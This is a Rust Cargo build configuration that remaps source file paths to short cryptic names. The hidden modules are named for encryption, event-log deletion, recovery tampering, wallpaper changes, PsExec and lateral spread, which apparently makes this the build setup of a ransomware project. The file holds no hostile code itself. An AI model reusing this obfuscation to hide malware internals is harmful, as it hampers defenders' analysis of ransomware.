[target.x86_64-pc-windows-msvc]
rustflags = [
    "-Ctarget-feature=+crt-static", 
    "--remap-path-prefix=src\\enumerate.rs=src\\e.rs",
    "--remap-path-prefix=src\\encrypt.rs=src\\e2.rs",
    "--remap-path-prefix=src\\discovery.rs=src\\d.rs",
    "--remap-path-prefix=src\\eventdel.rs=src\\e3.rs",
    "--remap-path-prefix=src\\kvm.rs=src\\k.rs",
    "--remap-path-prefix=src\\psexec.rs=src\\p.rs",
    "--remap-path-prefix=src\\recovery.rs=src\\r.rs",
    "--remap-path-prefix=src\\recycling.rs=src\\r2.rs",
    "--remap-path-prefix=src\\registry.rs=src\\r3.rs",
    "--remap-path-prefix=src\\wallpaper.rs=src\\w.rs",
    "--remap-path-prefix=src\\latmove=src\\lm",
    "--remap-path-prefix=src\\latmove\\nbtscan=src\\lm\\ns",
    "--remap-path-prefix=src\\latmove\\nbtscan\\ip_range.rs=src\\lm\\ns\\ir.rs",
    "--remap-path-prefix=src\\latmove\\nbtscan\\nbt_packet.rs=src\\lm\\ns\\np.rs",
    "--remap-path-prefix=src\\latmove\\local_ips.rs=src\\lm\\li.rs",
    "--remap-path-prefix=src\\latmove\\propagate.rs=src\\lm\\p.rs",
]


[target.x86_64-unknown-linux-musl]
linker = "rust-lld"
rustflags = [
    "--remap-path-prefix=src/enumerate.rs=src/e.rs",
    "--remap-path-prefix=src/encrypt.rs=src/e2.rs",
    "--remap-path-prefix=src/discovery.rs=src/d.rs",
    "--remap-path-prefix=src/kvm.rs=src/k.rs",
]
